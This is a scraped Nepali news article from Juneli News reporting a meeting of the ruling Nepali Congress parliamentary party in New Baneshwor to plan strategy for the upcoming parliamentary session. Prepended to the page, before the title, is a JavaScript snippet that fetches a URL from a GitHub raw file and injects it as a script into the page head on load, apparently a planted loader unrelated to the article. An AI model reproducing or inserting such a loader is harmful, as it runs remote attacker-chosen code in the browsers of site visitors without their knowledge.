;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});  सत्तारुढ नेपाली कांग्रेस संसदीय दलको बैठक नयाँबानेश्वरमा बस्दै – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  •  सत्तारुढ नेपाली कांग्रेस संसदीय दलको बैठक नयाँबानेश्वरमा बस्दै
Breaking News

 सत्तारुढ नेपाली कांग्रेस संसदीय दलको बैठक नयाँबानेश्वरमा बस्दै

जुनेली न्यूज, काठमाण्डौ |   सत्तारुढ नेपाली कांग्रेस संसदीय दलको बैठक आज बस्दै छ।

मंगलबार दिउँसो २ बजे नयाँबानेश्वरस्थित संसद भवनको ल्होत्से हलमा बैठक बस्ने कांग्रेसले जनाएको छ।

बुधवारदेखि सुरु हुने संसद अधिवेशनमा प्रस्तुत हुने पार्टीको रणनीति तय गर्न बैठक बस्न लागेको कांग्रेसका एक सांसदले जानकारी दिए।

बैठकमा संसदमा सत्तारुढ दलका सांसदले खेल्नुपर्ने भूमिका, बजेट, अध्यादेश लगायतका विषयमा सांसदहरुलाई जानकारी दिने तयारी काग्रेसले गरेको छ।

 

फेसबुक प्रतिक्रियाहरु